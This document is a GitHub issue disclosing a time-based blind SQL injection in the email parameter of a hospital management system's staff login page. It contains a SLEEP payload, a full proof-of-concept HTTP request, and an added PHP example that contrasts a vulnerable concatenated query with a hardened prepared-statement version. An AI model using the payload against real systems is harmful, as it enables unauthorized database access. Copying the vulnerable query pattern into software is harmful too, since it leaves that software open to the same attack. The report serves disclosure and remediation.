SQL Injection vulnerability via the "email" parameter in hms-staff.php #2

Open
khanhchauminh opened this issue Nov 8, 2021 · 0 comments

khanhchauminh commented Nov 8, 2021

Author

KhanhCM (@khanhchauminh)

Version: 1.0

No login is required

Steps to reproduce

  1. Go to the Staff Login page.
  2. Enter a username and password, and choose Admin as the User Type.
  3. Click the Login button.
  4. Intercept the request and insert the payload into the value of the email parameter.

Example payload:

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a

Proof-of-concept

POST /hms-staff.php HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/hms-staff.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ghpdj0nh826f31malqm7j3dko7
Connection: close

email=admin@example.com'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&password=password&type=admin

Response in Burp Suite

[screenshot of the delayed response; image not reproduced]

Source code review

hms-staff.php

[screenshot of the vulnerable query in hms-staff.php; image not reproduced]

library.php

[screenshot of the database helper in library.php; image not reproduced]

Remediation

Validate input of email parameter in hms-staff.php.
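
The following PHP is an added example and is not the project's code or the reporter's; the real hms-staff.php and library.php appear only as screenshots above, so the vulnerable query is an assumed reconstruction of the pattern the report describes (the POSTed email concatenated into the SQL string). It shows why the payload in the report works and what a fix that does not depend on input validation alone looks like: the email is bound as a parameter, the user type is checked against an allow-list, and the password is verified against a stored hash instead of being placed in the WHERE clause. The table name `staff`, its columns, the role names and the `password_hash` column are assumptions.

```php
<?php
// Added example, not the project's code. The real hms-staff.php is only shown
// as a screenshot in the report, so the vulnerable query below is an assumed
// reconstruction of the pattern the report describes.
declare(strict_types=1);

// --- Vulnerable pattern (assumed reconstruction) -----------------------------
function vulnerableLoginQuery(string $email, string $password, string $type): string
{
    // Plain string concatenation. The reported payload
    //   ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
    // closes the quoted email, runs SLEEP(5) inside a derived table, and
    // re-opens a quote so the statement stays syntactically valid. The 5 s
    // delay in the response is the only signal the attacker needs.
    return "SELECT id, name FROM staff WHERE email = '$email' "
         . "AND password = '$password' AND type = '$type'";
}

// --- Hardened version ---------------------------------------------------------
// Assumed schema: staff(id, name, email, password_hash, type), where
// password_hash holds password_hash() output. Requires mysqlnd for get_result().
function hardenedLogin(mysqli $db, string $email, string $password, string $type): ?array
{
    // 1. Allow-list the role: it is a fixed enumeration, not free text.
    $allowedTypes = ['admin', 'doctor', 'nurse']; // assumed set of roles
    if (!in_array($type, $allowedTypes, true)) {
        return null;
    }

    // 2. Validate the email shape. This is defence in depth only; it is the
    //    bound parameter below, not this check, that stops the injection.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // 3. Prepared statement with bound parameters: the values are sent to
    //    MySQL separately from the query text, so a quote in $email can never
    //    change the statement's structure.
    $stmt = $db->prepare(
        'SELECT id, name, password_hash FROM staff WHERE email = ? AND type = ? LIMIT 1'
    );
    $stmt->bind_param('ss', $email, $type);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // 4. Verify the password against the stored hash (constant-time compare)
    //    rather than matching plaintext inside the WHERE clause.
    if ($row === null || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Show how the reported payload distorts the concatenated query. The value is
// constructed here to match the decoded "email" parameter from the PoC request.
$payload = "admin@example.com' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a";
echo vulnerableLoginQuery($payload, 'password', 'admin'), PHP_EOL;
```

Running the file with the PHP CLI prints the assembled vulnerable statement, in which the injected `AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)` sits between the `email` comparison and the `password` comparison as part of the WHERE clause, which is exactly what makes the response arrive about five seconds late. `hardenedLogin()` needs a live `mysqli` connection (not included), and with it the same payload simply fails `FILTER_VALIDATE_EMAIL`; even if that check were removed, the bound parameter would make MySQL look for a literal email address containing the payload text, not execute it.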
